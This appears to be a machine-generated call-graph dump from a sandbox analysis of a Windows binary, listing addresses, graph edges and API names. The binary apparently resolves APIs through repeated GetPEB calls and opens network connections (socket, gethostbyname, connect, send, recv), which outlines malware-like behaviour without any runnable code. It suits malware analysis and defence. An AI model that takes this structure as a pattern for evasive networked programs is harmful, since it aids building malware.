7f2ded70 GetPEB 46661->46665 46662->46530 46664->46534 46665->46662 46667 7f2df84f 46666->46667 46705 7f2a1d50 46667->46705 46672 7f2dfb20 46713 7f2a1f60 46672->46713 46675 7f2dfbd7 46721 7f2a1f30 GetPEB 46675->46721 46677 7f2dfd32 46679 7f2dffdc 46677->46679 46682 7f2dfe9b 46677->46682 46678 7f2d9d33 46678->46541 46678->46543 46717 7f2a1cc0 46679->46717 46722 7f2a1f30 GetPEB 46682->46722 46684 7f2e0154 46723 7f2a1f30 GetPEB 46684->46723 46687 7f2a1d2c 46686->46687 46688 7f2a1d3e 46686->46688 46728 7f2ded70 GetPEB 46687->46728 46691 7f2a1ea0 GetPEB 46688->46691 46690->46553 46691->46557 46694 7f2c243d 46692->46694 46693 7f2c249c GetPEB 46695 7f2c2513 GetPEB 46693->46695 46694->46693 46697 7f2c2809 46695->46697 46729 7f2de1b0 GetPEB 46697->46729 46699 7f2c29c5 46700 7f2a1db0 GetPEB 46699->46700 46700->46561 46701->46563 46702->46567 46703->46569 46704->46552 46706 7f2a1d5c 46705->46706 46707 7f2a1d6e 46705->46707 46724 7f2ded70 GetPEB 46706->46724 46707->46678 46709 7f2a1f90 46707->46709 46710 7f2a1f9c 46709->46710 46711 7f2a1fae CoInitializeSecurity 46709->46711 46725 7f2ded70 GetPEB 46710->46725 46711->46672 46714 7f2a1f6c 46713->46714 46716 7f2a1f7e 46713->46716 46726 7f2ded70 GetPEB 46714->46726 46716->46675 46716->46677 46718 7f2a1ccc 46717->46718 46719 7f2a1cde CoSetProxyBlanket 46717->46719 46727 7f2ded70 GetPEB 46718->46727 46719->46678 46719->46684 46721->46678 46722->46678 46723->46678 46724->46707 46725->46711 46726->46716 46727->46719 46728->46688 46729->46699 46731 7f2db26d GetPEB 46730->46731 46731->46621 46732->46633 46733->46635 46734->46637 46735->46639 46736->46641 46737->46643 46738->46645 46740 7f2954a7 numpunct 46739->46740 46742 7f2954b1 std::ios_base::clear 46740->46742 46745 7f2c23f0 15 API calls numpunct 46740->46745 46744 7f2954ca ctype 46742->46744 46746 7f2949f0 14 API calls 2 library calls 46742->46746 46744->45958 46745->46742 46746->46744 46841 7f2a5560 46747->46841 46750 7f2c3200 Concurrency::cancellation_token_source::~cancellation_token_source 55 API calls 46751 7f2931af 46750->46751 46751->45962 46755 7f2a5fbc 46752->46755 46754 7f2a6061 46756 7f2a6069 46754->46756 46757 7f2a60e1 46754->46757 46760 7f2a5fe0 46755->46760 46872 7f2ad010 26 API calls 46755->46872 46875 7f2a8760 56 API calls 3 library calls 46756->46875 46877 7f29bed0 56 API calls Concurrency::cancellation_token_source::~cancellation_token_source 46757->46877 46760->46754 46762 7f2a67d0 numpunct 26 API calls 46760->46762 46761 7f2a60d9 46764 7f2c3200 Concurrency::cancellation_token_source::~cancellation_token_source 55 API calls 46761->46764 46763 7f2a601c 46762->46763 46873 7f2c58b0 26 API calls 2 library calls 46763->46873 46767 7f2a611d 46764->46767 46767->45966 46768 7f2a6079 46768->46761 46876 7f2ab180 56 API calls Concurrency::cancellation_token_source::~cancellation_token_source 46768->46876 46769 7f2a603b 46874 7f2f1ac5 RaiseException 46769->46874 46771 7f2a604f 46772 7f2c20f0 std::ios_base::clear 11 API calls 46771->46772 46772->46754 46878 7f2a5590 46773->46878 46776 7f2c3200 Concurrency::cancellation_token_source::~cancellation_token_source 55 API calls 46777 7f29320f 46776->46777 46777->45970 46779 7f299635 46778->46779 46893 7f2937c0 46779->46893 46782 7f293b50 46897 7f2a54d0 46782->46897 46785 7f2c3200 Concurrency::cancellation_token_source::~cancellation_token_source 55 API calls 46786 7f293b9f 46785->46786 46786->46032 46910 7f2a55d0 46787->46910 46790 7f2c3200 Concurrency::cancellation_token_source::~cancellation_token_source 55 API calls 46791 7f29326f 46790->46791 46791->46058 46793 7f2c3200 Concurrency::cancellation_token_source::~cancellation_token_source 55 API calls 46792->46793 46794 7f2a5d6c 46793->46794 46795 7f2c3200 Concurrency::cancellation_token_source::~cancellation_token_source 55 API calls 46794->46795 46796 7f2a5d91 46795->46796 46797 7f2c3200 46796->46797 46798 7f2c322c 46797->46798 46799 7f2c320f 46797->46799 46802 7f2c3254 46798->46802 46967 7f2ff35d 55 API calls Concurrency::cancellation_token_source::~cancellation_token_source 46798->46967 46799->46798 46966 7f2ff35d 55 API calls Concurrency::cancellation_token_source::~cancellation_token_source 46799->46966 46804 7f2c327c 46802->46804 46968 7f2ff35d 55 API calls Concurrency::cancellation_token_source::~cancellation_token_source 46802->46968 46805 7f2c7680 46804->46805 46806 7f2c76b5 std::exception::exception 46805->46806 46807 7f2c789d 46806->46807 46808 7f2c76bf 46806->46808 46840 7f2c786f Concurrency::cancellation_token_source::~cancellation_token_source 46807->46840 46971 7f2e7c30 56 API calls Concurrency::cancellation_token_source::~cancellation_token_source 46807->46971 46969 7f2e7c30 56 API calls Concurrency::cancellation_token_source::~cancellation_token_source 46808->46969 46811 7f2c7d2b 46813 7f2c7d37 46811->46813 46814 7f2c7d50 46811->46814 46812 7f2c76f6 Concurrency::cancellation_token_source::~cancellation_token_source 46970 7f299830 56 API calls Concurrency::cancellation_token_source::~cancellation_token_source 46812->46970 46816 7f2c7d41 46813->46816 46817 7f2c7de2 46813->46817 46978 7f2a8f90 56 API calls Concurrency::cancellation_token_source::~cancellation_token_source 46814->46978 46815 7f2a5d30 Concurrency::cancellation_token_source::~cancellation_token_source 55 API calls 46815->46840 46823 7f2c20f0 std::ios_base::clear 11 API calls 46816->46823 46831 7f2c7d4b std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 46816->46831 46819 7f2c1ff0 Concurrency::cancellation_token_source::~cancellation_token_source 56 API calls 46817->46819 46824 7f2c7df8 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 46819->46824 46821 7f2c7d66 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 46821->46831 46979 7f2be850 11 API calls Concurrency::cancellation_token_source::~cancellation_token_source 46821->46979 46825 7f2c7e8a std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 46823->46825 46824->46831 46980 7f2be850 11 API calls Concurrency::cancellation_token_source::~cancellation_token_source 46824->46980 46825->46831 46981 7f2be850 11 API calls Concurrency::cancellation_token_source::~cancellation_token_source 46825->46981 46826 7f2c78e8 Concurrency::cancellation_token_source::~cancellation_token_source 46826->46840 46972 7f296b30 56 API calls Concurrency::cancellation_token_source::~cancellation_token_source 46826->46972 46827 7f2c1ff0 Concurrency::cancellation_token_source::~cancellation_token_source 56 API calls 46830 7f2c7f09 46827->46830 46830->46072 46831->46827 46834 7f2c3200 Concurrency::cancellation_token_source::~cancellation_token_source 55 API calls 46834->46840 46836 7f2c7680 Concurrency::cancellation_token_source::~cancellation_token_source 56 API calls 46836->46840 46840->46811 46840->46815 46840->46834 46840->46836 46973 7f2e4160 56 API calls 2 library calls 46840->46973 46974 7f299830 56 API calls Concurrency::cancellation_token_source::~cancellation_token_source 46840->46974 46975 7f2c4e80 56 API calls Concurrency::cancellation_token_source::~cancellation_token_source 46840->46975 46976 7f296b30 56 API calls Concurrency::cancellation_token_source::~cancellation_token_source 46840->46976 46977 7f2c4dd0 56 API calls Concurrency::cancellation_token_source::~cancellation_token_source 46840->46977 46846 7f29b820 46841->46846 46844 7f2c3200 Concurrency::cancellation_token_source::~cancellation_token_source 55 API calls 46845 7f2931a4 46844->46845 46845->46750 46855 7f2c2c30 46846->46855 46849 7f2a67d0 numpunct 26 API calls 46850 7f29b8a6 46849->46850 46851 7f29b8cf 46850->46851 46868 7f2ff35d 55 API calls Concurrency::cancellation_token_source::~cancellation_token_source 46850->46868 46864 7f2a9600 46851->46864 46854 7f29b90a 46854->46844 46856 7f2c2c4f 46855->46856 46857 7f2c2c4a 46855->46857 46859 7f2c2c5f 46856->46859 46860 7f2c2c70 46856->46860 46869 7f2c1a70 RaiseException CallUnexpected Concurrency::cancel_current_task 46857->46869 46870 7f294a70 14 API calls 3 library calls 46859->46870 46862 7f29b84c 46860->46862 46863 7f2f07db std::_Facet_Register 3 API calls 46860->46863 46862->46849 46863->46862 46865 7f2a9627 46864->46865 46867 7f2a966c std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 46864->46867 46865->46867 46871 7f2be850 11 API calls Concurrency::cancellation_token_source::~cancellation_token_source 46865->46871 46867->46854 46868->46851 46869->46856 46870->46862 46871->46867 46872->46755 46873->46769 46874->46771 46875->46768 46876->46768 46877->46761 46883 7f29b920 46878->46883 46881 7f2c3200 Concurrency::cancellation_token_source::~cancellation_token_source 55 API calls 46882 7f293204 46881->46882 46882->46776 46884 7f2c2c30 14 API calls 46883->46884 46885 7f29b94c 46884->46885 46886 7f2a63a0 std::ios_base::clear 26 API calls 46885->46886 46887 7f29b9a4 46886->46887 46890 7f29b9cd 46887->46890 46892 7f2ff35d 55 API calls Concurrency::cancellation_token_source::~cancellation_token_source 46887->46892 46889 7f2a9600 11 API calls 46891 7f29ba08 46889->46891 46890->46889 46891->46881 46892->46890 46894 7f293860 46893->46894 46895 7f29382f 46893->46895 46896 7f295360 numpunct 26 API calls 46894->46896 46895->46782 46896->46895 46902 7f29ba20 46897->46902 46900 7f2c3200 Concurrency::cancellation_token_source::~cancellation_token_source 55 API calls 46901 7f293b94 46900->46901 46901->46785 46903 7f2c2c30 14 API calls 46902->46903 46904 7f29ba37 std::ios_base::clear 46903->46904 46907 7f29bab1 46904->46907 46909 7f2ff35d 55 API calls Concurrency::cancellation_token_source::~cancellation_token_source 46904->46909 46906 7f2a9600 11 API calls 46908 7f29bae5 46906->46908 46907->46906 46908->46900 46909->46907 46913 7f29b6b0 46910->46913 46918 7f29bff0 46913->46918 46916 7f2c3200 Concurrency::cancellation_token_source::~cancellation_token_source 55 API calls 46917 7f293264 46916->46917 46917->46790 46927 7f2c2d10 46918->46927 46922 7f29c08c 46925 7f29c0b5 46922->46925 46944 7f2ff35d 55 API calls Concurrency::cancellation_token_source::~cancellation_token_source 46922->46944 46940 7f2a9740 46925->46940 46926 7f29b6ff 46926->46916 46928 7f2c2d2f 46927->46928 46929 7f2c2d2a 46927->46929 46931 7f2c2d3f 46928->46931 46932 7f2c2d50 46928->46932 46945 7f2c1a70 RaiseException CallUnexpected Concurrency::cancel_current_task 46929->46945 46946 7f294a70 14 API calls 3 library calls 46931->46946 46934 7f2f07db std::_Facet_Register 3 API calls 46932->46934 46935 7f29c01c 46932->46935 46934->46935 46936 7f2939c0 46935->46936 46937 7f293a25 46936->46937 46947 7f2958c0 46937->46947 46941 7f2a9767 46940->46941 46942 7f2a97ac std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 46940->46942 46941->46942 46965 7f2be850 11 API calls Concurrency::cancellation_token_source::~cancellation_token_source 46941->46965 46942->46926 46944->46925 46945->46928 46946->46935 46948 7f2958fd 46947->46948 46949 7f293a51 46947->46949 46955 7f2be980 26 API calls Concurrency::cancellation_token_source::~cancellation_token_source 46948->46955 46949->46922 46951 7f295909 46956 7f29acd0 56 API calls Concurrency::cancellation_token_source::~cancellation_token_source 46951->46956 46953 7f29593d 46953->46949 46957 7f2c1ff0 46953->46957 46955->46951 46956->46953 46958 7f2c2044 46957->46958 46962 7f2c20a0 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 46957->46962 46963 7f295fb0 56 API calls 2 library calls 46958->46963 46960 7f2c2059 46960->46962 46964 7f2be850 11 API calls Concurrency::cancellation_token_source::~cancellation_token_source 46960->46964 46962->46949 46963->46960 46964->46962 46965->46942 46966->46798 46967->46802 46968->46804 46969->46812 46970->46840 46971->46826 46972->46826 46973->46840 46974->46840 46975->46840 46976->46840 46977->46840 46978->46821 46979->46831 46980->46831 46981->46831 47295 7f2a71d0 46982->47295 46989 7f2d6070 46990 7f2a71d0 55 API calls 46989->46990 46991 7f2d6098 46990->46991 47310 7f2eb1c0 46991->47310 46994 7f2a72d0 26 API calls 46995 7f2d60cf 46994->46995 46996 7f2aa1a0 46995->46996 46997 7f2aa1ca 46996->46997 46998 7f2aa210 46996->46998 46999 7f2a67d0 numpunct 26 API calls 46997->46999 47003 7f2aa22c 46998->47003 47317 7f2ff35d 55 API calls Concurrency::cancellation_token_source::~cancellation_token_source 46998->47317 47000 7f2aa1d7 46999->47000 47315 7f2c51c0 26 API calls 2 library calls 47000->47315 47003->46086 47003->46087 47004 7f2aa1f0 47316 7f2f1ac5 RaiseException 47004->47316 47006 7f2aa201 47007 7f2c20f0 std::ios_base::clear 11 API calls 47006->47007 47007->46998 47009 7f2945f9 47008->47009 47010 7f29463e 47009->47010 47318 7f2a8760 56 API calls 3 library calls 47009->47318 47013 7f2946b5 47010->47013 47014 7f294664 47010->47014 47012 7f294627 47015 7f2c3200 Concurrency::cancellation_token_source::~cancellation_token_source 55 API calls 47012->47015 47019 7f2a67d0 numpunct 26 API calls 47013->47019 47016 7f2a67d0 numpunct 26 API calls 47014->47016 47015->47010 47017 7f294670 47016->47017 47319 7f29a920 56 API calls 47017->47319 47021 7f2946c9 47019->47021 47020 7f294696 47022 7f2c20f0 std::ios_base::clear 11 API calls 47020->47022 47320 7f294850 26 API calls std::ios_base::clear 47021->47320 47025 7f2946ad 47022->47025 47024 7f2946eb 47321 7f2c58b0 26 API calls 2 library calls 47024->47321 47025->46107 47027 7f294710 47322 7f2f1ac5 RaiseException 47027->47322 47029 7f294724 47030 7f2c20f0 std::ios_base::clear 11 API calls 47029->47030 47031 7f294730 47030->47031 47032 7f2c20f0 std::ios_base::clear 11 API calls 47031->47032 47032->47025 47034 7f2d39f6 47033->47034 47323 7f2a77a0 47034->47323 47036 7f2d3a1a 47326 7f2a78f0 47036->47326 47038 7f2d3a65 _Ptr_base 47039 7f2d3a8c 47038->47039 47040 7f2d3aaa 47038->47040 47332 7f2d3b50 55 API calls Concurrency::cancellation_token_source::~cancellation_token_source 47039->47332 47333 7f2d3b50 55 API calls Concurrency::cancellation_token_source::~cancellation_token_source 47040->47333 47043 7f2d3aa8 std::ios_base::clear 47044 7f2c20f0 std::ios_base::clear 11 API calls 47043->47044 47045 7f2d3b05 _Ptr_base 47044->47045 47046 7f2c20f0 std::ios_base::clear 11 API calls 47045->47046 47047 7f2d3b31 47046->47047 47047->46115 47049 7f2d5eee 47048->47049 47393 7f2c33f0 47049->47393 47053 7f2948ec numpunct 47052->47053 47055 7f294931 47053->47055 47400 7f2c23f0 15 API calls numpunct 47053->47400 47396 7f2a6df0 47055->47396 47057 7f2949ab 47058 7f2a9e20 47057->47058 47059 7f2a9e3c 47058->47059 47061 7f2a9e37 std::ios_base::clear 47058->47061 47060 7f2c20f0 std::ios_base::clear 11 API calls 47059->47060 47060->47061 47061->46147 47063 7f2e43b2 47062->47063 47402 7f2a70d0 47063->47402 47067 7f2e43f6 47068 7f2e4492 GetPEB 47067->47068 47069 7f2e44f9 47068->47069 47070 7f2e4740 GetPEB 47069->47070 47071 7f2e47a7 47070->47071 47072 7f2a70d0 71 API calls 47071->47072 47073 7f2e49dd 47072->47073 47417 7f293db0 47073->47417 47078 7f293db0 26 API calls 47079 7f2e4a36 47078->47079 47080 7f293db0 26 API calls 47079->47080 47081 7f2e4a3f 47080->47081 47082 7f293db0 26 API calls 47081->47082 47083 7f2e4a7a 47082->47083 47084 7f293db0 26 API calls 47083->47084 47085 7f2e4a83 47084->47085 47086 7f293db0 26 API calls 47085->47086 47087 7f2e4ac2 47086->47087 47088 7f293d30 26 API calls 47087->47088 47089 7f2e4acb 47088->47089 47090 7f293db0 26 API calls 47089->47090 47091 7f2e4ad4 47090->47091 47092 7f293db0 26 API calls 47091->47092 47093 7f2e4b3d 47092->47093 47094 7f2a9f90 59 API calls 47093->47094 47095 7f2e4b47 47094->47095 47096 7f293db0 26 API calls 47095->47096 47097 7f2e4b4d 47096->47097 47098 7f293db0 26 API calls 47097->47098 47099 7f2e4ba6 47098->47099 47100 7f293db0 26 API calls 47099->47100 47101 7f2e4baf 47100->47101 47102 7f293db0 26 API calls 47101->47102 47103 7f2e4c2d 47102->47103 47104 7f293db0 26 API calls 47103->47104 47105 7f2e4c36 47104->47105 47106 7f293db0 26 API calls 47105->47106 47107 7f2e4c3f 47106->47107 47108 7f293d30 26 API calls 47107->47108 47109 7f2e4c52 47108->47109 47429 7f2eba00 47109->47429 47112 7f2e4cda 47113 7f2e501e GetPEB 47112->47113 47114 7f2e4f0c 47112->47114 47125 7f2e5097 socket 47113->47125 47114->47114 47115 7f295360 numpunct 26 API calls 47114->47115 47116 7f2e4f9f 47115->47116 47118 7f2c20f0 std::ios_base::clear 11 API calls 47116->47118 47120 7f2e4fbb 47118->47120 47119 7f2e53e8 std::ios_base::clear 47122 7f2e53f0 GetPEB 47119->47122 47435 7f2a9300 11 API calls 47120->47435 47138 7f2e5445 gethostbyname 47122->47138 47123 7f2e4fca 47436 7f2a9300 11 API calls 47123->47436 47124 7f2e52d6 47124->47124 47126 7f295360 numpunct 26 API calls 47124->47126 47125->47119 47125->47124 47128 7f2e5369 47126->47128 47130 7f2c20f0 std::ios_base::clear 11 API calls 47128->47130 47129 7f2e4fe4 47135 7f2c20f0 std::ios_base::clear 11 API calls 47129->47135 47131 7f2e5385 47130->47131 47437 7f2a9300 11 API calls 47131->47437 47134 7f2e578a GetPEB 47157 7f2e57e7 47134->47157 47137 7f2e4ffb 47135->47137 47136 7f2e5394 47438 7f2a9300 11 API calls 47136->47438 47139 7f2c20f0 std::ios_base::clear 11 API calls 47137->47139 47138->47134 47140 7f2e5678 47138->47140 47141 7f2e5007 47139->47141 47140->47140 47144 7f295360 numpunct 26 API calls 47140->47144 47145 7f2c20f0 std::ios_base::clear 11 API calls 47141->47145 47143 7f2e53ae 47149 7f2c20f0 std::ios_base::clear 11 API calls 47143->47149 47147 7f2e570b 47144->47147 47146 7f2e5016 47145->47146 47146->46167 47148 7f2c20f0 std::ios_base::clear 11 API calls 47147->47148 47150 7f2e5727 47148->47150 47151 7f2e53c5 47149->47151 47439 7f2a9300 11 API calls 47150->47439 47153 7f2c20f0 std::ios_base::clear 11 API calls 47151->47153 47155 7f2e53d1 47153->47155 47154 7f2e5736 47440 7f2a9300 11 API calls 47154->47440 47156 7f2c20f0 std::ios_base::clear 11 API calls 47155->47156 47156->47146 47159 7f295360 numpunct 26 API calls 47157->47159 47162 7f2e5a9a std::ios_base::clear 47159->47162 47160 7f2e5750 47161 7f2c20f0 std::ios_base::clear 11 API calls 47160->47161 47163 7f2e5767 47161->47163 47164 7f2e5ac8 GetPEB 47162->47164 47165 7f2c20f0 std::ios_base::clear 11 API calls 47163->47165 47168 7f2e5b1c GetPEB 47164->47168 47166 7f2e5773 47165->47166 47167 7f2c20f0 std::ios_base::clear 11 API calls 47166->47167 47167->47146 47170 7f2e5d93 GetPEB 47168->47170 47176 7f2e6029 connect 47170->47176 47173 7f2e6384 std::ios_base::clear 47174 7f2e63b1 GetPEB 47173->47174 47187 7f2e6426 send 47174->47187 47175 7f2e6263 47175->47175 47177 7f295360 numpunct 26 API calls 47175->47177 47176->47173 47176->47175 47178 7f2e62f6 47177->47178 47179 7f2c20f0 std::ios_base::clear 11 API calls 47178->47179 47180 7f2e6312 47179->47180 47182 7f2c20f0 std::ios_base::clear 11 API calls 47180->47182 47183 7f2e6321 47182->47183 47441 7f2a9300 11 API calls 47183->47441 47185 7f2e6330 47442 7f2a9300 11 API calls 47185->47442 47186 7f2e6658 47186->47186 47189 7f295360 numpunct 26 API calls 47186->47189 47187->47186 47188 7f2e676a 47187->47188 47188->47188 47190 7f295360 numpunct 26 API calls 47188->47190 47192 7f2e66dc 47189->47192 47225 7f2e67e4 std::ios_base::clear 47190->47225 47194 7f2c20f0 std::ios_base::clear 11 API calls 47192->47194 47193 7f2e634a 47201 7f2c20f0 std::ios_base::clear 11 API calls 47193->47201 47197 7f2e66f8 47194->47197 47195 7f2e67fc GetPEB 47195->47225 47196 7f2e6cf8 47199 7f2e73fd GetPEB 47196->47199 47200 7f2e6e31 GetPEB 47196->47200 47198 7f2c20f0 std::ios_base::clear 11 API calls 47197->47198 47202 7f2e6707 47198->47202 47213 7f2e743c GetPEB 47199->47213 47214 7f2e6e71 GetPEB 47200->47214 47203 7f2e6361 47201->47203 47443 7f2a9300 11 API calls 47202->47443 47205 7f2c20f0 std::ios_base::clear 11 API calls 47203->47205 47207 7f2e636d 47205->47207 47206 7f2e6716 47444 7f2a9300 11 API calls 47206->47444 47209 7f2c20f0 std::ios_base::clear 11 API calls 47207->47209 47208 7f2e6a7e recv 47210 7f2e6ab5 GetPEB 47208->47210 47208->47225 47209->47146 47210->47225 47212 7f2e6730 47217 7f2c20f0 std::ios_base::clear 11 API calls 47212->47217 47226 7f2e7693 47213->47226 47227 7f2e70b6 47214->47227 47218 7f2e6747 47217->47218 47219 7f2c20f0 std::ios_base::clear 11 API calls 47218->47219 47221 7f2e6753 47219->47221 47220 7f295360 numpunct 26 API calls 47220->47225 47222 7f2c20f0 std::ios_base::clear 11 API calls 47221->47222 47222->47146 47225->47195 47225->47196 47225->47208 47225->47220 47228 7f2c20f0 11 API calls std::ios_base::clear 47225->47228 47445 7f2a65a0 26 API calls numpunct 47225->47445 47446 7f2c3000 26 API calls std::ios_base::clear 47225->47446 47449 7f2a65a0 26 API calls numpunct 47226->47449 47229 7f295360 numpunct 26 API calls 47227->47229 47228->47225 47230 7f2e7360 47229->47230 47232 7f2c20f0 std::ios_base::clear 11 API calls 47230->47232 47234 7f2e737c 47232->47234 47233 7f2e7904 47235 7f2c20f0 std::ios_base::clear 11 API calls 47233->47235 47236 7f2c20f0 std::ios_base::clear 11 API calls 47234->47236 47237 7f2e7925 47235->47237 47238 7f2e738b 47236->47238 47239 7f2c20f0 std::ios_base::clear 11 API calls 47237->47239 47240 7f2c20f0 std::ios_base::clear 11 API calls 47238->47240 47241 7f2e7934 47239->47241 47242 7f2e739a 47240->47242 47243 7f2c20f0 std::ios_base::clear 11 API calls 47241->47243 47447 7f2a9300 11 API calls 47242->47447 47245 7f2e7943 47243->47245 47450 7f2a9300 11 API calls 47245->47450 47246 7f2e73a9 47448 7f2a9300 11 API calls 47246->47448 47248 7f2e7952 47451 7f2a9300 11 API calls 47248->47451 47250 7f2e73c3 47253 7f2c20f0 std::ios_base::clear 11 API calls 47250->47253 47252 7f2e796c std::ios_base::_Ios_base_dtor 47255 7f2c20f0 std::ios_base::clear 11 API calls 47252->47255 47254 7f2e73da 47253->47254 47256 7f2c20f0 std::ios_base::clear 11 API calls 47254->47256 47257 7f2e79af 47255->47257 47258 7f2e73e6 47256->47258 47259 7f2c20f0 std::ios_base::clear 11 API calls 47257->47259 47260 7f2c20f0 std::ios_base::clear 11 API calls 47258->47260 47261 7f2e79bb 47259->47261 47260->47146 47262 7f2c20f0 std::ios_base::clear 11 API calls 47261->47262 47262->47146 47263->46093 47264->46102 47266 7f29d21d 47265->47266 47564 7f29d0c0 47266->47564 47268 7f29d240 std::ios_base::clear 47269 7f2c20f0 std::ios_base::clear 11 API calls 47268->47269 47270 7f29d267 47269->47270 47271 7f2c5a00 47270->47271 47272 7f2a63a0 std::ios_base::clear 26 API calls 47271->47272 47273 7f2c5a59 47272->47273 47583 7f2e25d0 47273->47583 47276 7f2a63a0 std::ios_base::clear 26 API calls 47277 7f2c5a76 47276->47277 47587 7f2e79e0 47277->47587 47280 7f2c20f0 std::ios_base::clear 11 API calls 47281 7f2c5a9a 47280->47281 47282 7f2c20f0 std::ios_base::clear 11 API calls 47281->47282 47283 7f2c5aa9 47282->47283 47283->46108 47284->46125 47285->46124 47286->46151 47287->46170 47288->46192 47289->46223 47290->46254 47291->46265 47292->46244 47293->46214 47294->46184 47296 7f2a7243 47295->47296 47298 7f2a7257 47295->47298 47308 7f2ff35d 55 API calls Concurrency::cancellation_token_source::~cancellation_token_source 47296->47308 47299 7f2eb0e0 47298->47299 47300 7f2eb0f1 47299->47300 47302 7f2c36d0 47299->47302 47309 7f2ff35d 55 API calls Concurrency::cancellation_token_source::~cancellation_token_source 47300->47309 47303 7f2a72d0 47302->47303 47304 7f2a67d0 numpunct 26 API calls 47303->47304 47305 7f2a7339 47304->47305 47306 7f2a67d0 numpunct 26 API calls 47305->47306 47307 7f2a7349 47306->47307 47307->46989 47308->47298 47309->47302 47311 7f2eb1d1 47310->47311 47313 7f2d60a0 47310->47313 47314 7f2ff35d 55 API calls Concurrency::cancellation_token_source::~cancellation_token_source 47311->47314 47313->46994 47314->47313 47315->47004 47316->47006 47317->47003 47318->47012 47319->47020 47320->47024 47321->47027 47322->47029 47334 7f2a20e0 47323->47334 47325 7f2a77bd _Ptr_base 47325->47036 47327 7f2a7977 _memcpy_s 47326->47327 47337 7f2febec 47327->47337 47329 7f2a797f _memcpy_s 47342 7f2a6740 47329->47342 47331 7f2a7a15 _Ptr_base 47331->47038 47332->47043 47333->47043 47335 7f2f07db std::_Facet_Register 3 API calls 47334->47335 47336 7f2a20f4 _Ptr_base 47335->47336 47336->47325 47345 7f301eec GetLastError 47337->47345 47339 7f2febf7 47371 7f303d59 47339->47371 47385 7f295590 47342->47385 47344 7f2a67ac 47344->47331 47346 7f301f02 47345->47346 47347 7f301f08 47345->47347 47375 7f30432d 6 API calls std::_Locinfo::_Locinfo_ctor 47346->47375 47351 7f301f0c 47347->47351 47376 7f30436c 6 API calls std::_Locinfo::_Locinfo_ctor 47347->47376 47350 7f301f24 47350->47351 47352 7f301f2c 47350->47352 47353 7f301f91 SetLastError 47351->47353 47377 7f303b8e 14 API calls 3 library calls 47352->47377 47356 7f301f9c 47353->47356 47355 7f301f39 47357 7f301f41 47355->47357 47358 7f301f52 47355->47358 47356->47339 47378 7f30436c 6 API calls std::_Locinfo::_Locinfo_ctor 47357->47378 47379 7f30436c 6 API calls std::_Locinfo::_Locinfo_ctor 47358->47379 47361 7f301f4f 47381 7f303beb 14 API calls 2 library calls 47361->47381 47362 7f301f5e 47363 7f301f62 47362->47363 47364 7f301f79 47362->47364 47380 7f30436c 6 API calls std::_Locinfo::_Locinfo_ctor 47363->47380 47382 7f301cee 14 API calls __Getctype 47364->47382 47368 7f301f84 47383 7f303beb 14 API calls 2 library calls 47368->47383 47369 7f301f76 47369->47353 47372 7f2fec07 47371->47372 47373 7f303d6c 47371->47373 47372->47329 47373->47372 47384 7f308e72 16 API calls 3 library calls 47373->47384 47375->47347 47376->47350 47377->47355 47378->47361 47379->47362 47380->47361 47381->47369 47382->47368 47383->47369 47384->47372 47386 7f2955a7 numpunct 47385->47386 47388 7f2955b1 numpunct 47386->47388 47391 7f2c23f0 15 API calls numpunct 47386->47391 47390 7f2955ca _memcpy_s 47388->47390 47392 7f2949f0 14 API calls 2 library calls 47388->47392 47390->47344 47391->47388 47392->47390 47394 7f2c2420 3 API calls 47393->47394 47395 7f2c3449 47394->47395 47395->46131 47397 7f2a6f19 ctype 47396->47397 47399 7f2a6e86 numpunct 47396->47399 47397->47057 47401 7f2949f0 14 API calls 2 library calls 47399->47401 47400->47055 47401->47397 47403 7f2a70fb 47402->47403 47452 7f2a5b40 47403->47452 47408 7f2a9f90 47545 7f2a8aa0 47408->47545 47411 7f2c4ee0 std::ios_base::clear 26 API calls 47413 7f2aa172 47411->47413 47549 7f2a9c00 47413->47549 47416 7f2aa027 std::ios_base::_Ios_base_dtor 47416->47411 47418 7f293dee 47417->47418 47419 7f2a8aa0 26 API calls 47418->47419 47424 7f293eff 47419->47424 47420 7f2c4ee0 std::ios_base::clear 26 API calls 47421 7f29421f 47420->47421 47422 7f2a9c00 26 API calls 47421->47422 47423 7f29423a 47422->47423 47425 7f293d30 47423->47425 47424->47420 47426 7f293d54 47425->47426 47556 7f299220 47426->47556 47430 7f2eba34 47429->47430 47431 7f2c3290 26 API calls 47430->47431 47432 7f2eba5d std::ios_base::clear 47430->47432 47431->47432 47433 7f2c20f0 std::ios_base::clear 11 API calls 47432->47433 47434 7f2e4c67 GetPEB 47433->47434 47434->47112 47435->47123 47436->47129 47437->47136 47438->47143 47439->47154 47440->47160 47441->47185 47442->47193 47443->47206 47444->47212 47445->47225 47446->47225 47447->47246 47448->47250 47449->47233 47450->47248 47451->47252 47453 7f2a5b6b 47452->47453 47461 7f2a5c40 47453->47461 47458 7f2a7040 47539 7f2a6220 47458->47539 47460 7f2a7051 47460->47408 47462 7f2a5c6b 47461->47462 47469 7f2df7a0 47462->47469 47465 7f2a6130 47466 7f2a615b 47465->47466 47468 7f2a5beb 47466->47468 47538 7f2f02ad 9 API calls 2 library calls 47466->47538 47468->47458 47478 7f2c0410 47469->47478 47473 7f2df813 47475 7f2a5bd3 47473->47475 47497 7f2f02ad 9 API calls 2 library calls 47473->47497 47474 7f2df7ce 47474->47473 47489 7f2c4ee0 47474->47489 47475->47465 47479 7f2c4ee0 std::ios_base::clear 26 API calls 47478->47479 47480 7f2c0492 47479->47480 47481 7f2f07db std::_Facet_Register 3 API calls 47480->47481 47482 7f2c0499 47481->47482 47484 7f2c04b3 47482->47484 47498 7f2efda4 36 API calls 6 library calls 47482->47498 47485 7f2ec1d0 47484->47485 47486 7f2ec20d 47485->47486 47499 7f2a56a0 47486->47499 47488 7f2ec229 std::ios_base::_Ios_base_dtor 47488->47474 47490 7f2c4f6c 47489->47490 47491 7f2c4f09 47489->47491 47490->47473 47492 7f2c4f1a std::ios_base::clear 47491->47492 47535 7f2f1ac5 RaiseException 47491->47535 47536 7f2a83f0 26 API calls 2 library calls 47492->47536 47495 7f2c4f5e 47537 7f2f1ac5 RaiseException 47495->47537 47497->47475 47498->47484 47513 7f2ef98c 47499->47513 47503 7f2a56e5 47512 7f2a5707 47503->47512 47532 7f2bfba0 69 API calls 2 library calls 47503->47532 47505 7f2a57c0 47505->47488 47507 7f2a571f 47508 7f2a572e 47507->47508 47509 7f2a5727 